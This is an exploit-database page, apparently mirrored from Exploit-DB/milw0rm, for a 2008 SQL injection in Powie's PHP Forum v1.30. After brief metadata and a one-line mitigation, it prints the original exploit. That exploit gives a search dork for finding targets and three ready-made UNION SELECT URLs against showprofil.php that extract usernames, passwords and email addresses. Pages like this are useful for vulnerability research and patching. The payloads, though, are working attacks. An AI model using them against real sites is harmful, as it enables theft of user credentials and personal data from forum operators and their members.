Powie's PHP Forum - exploit.company

vendor:

PForum

by:

-tmh-

N/A

CVSS

N/A

SQL Injection

CWE

Product Name: PForum

Affected Version From: v1.30

Affected Version To: v1.30

Patch Exists: NO

Related CWE: N/A

CPE: a:powie:pforum

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Powie’s PHP Forum <= v1.30 (showprofil) Remote SQL Injection Exploit

An attacker can exploit a SQL injection vulnerability in Powie's PHP Forum v1.30 by sending a maliciously crafted HTTP request to the showprofil.php script. This can allow an attacker to gain access to the username, password, and email address of the user.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#=====================================================================================================
#Powie's PHP Forum <= v1.30 (showprofil) Remote SQL Injection Exploit
#=====================================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://www.powie.de
#
#Version : v1.30
#
#=====================================================================================================
#
#DORK : "pForum 1.30"
#
#
#Exploit :
#--------------------------------
#
#FOR USER: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,username)+FROM+pfuser+limit+1,1--
#FOR PASS: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,pwd)+FROM+pfuser+limit+1,1--
#FOR MAIL: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,emai)+FROM+pfuser+limit+1,1--
#
#=====================================================================================================
#Discoverd By : -tmh-
#
#Contact : tmh[at]sys-flaw.com
#
#Greetz To : n00bor , Five-Three-Nine , J0hn.X3r , electron1x , meckl, Floo , -Patrick_B ,
#	           Loader007 , bizzit , Sys-Flaw , Codesoft , Free-Hack  abcdef ,
#
#
#=====================================================================================================

# milw0rm.com [2008-09-12]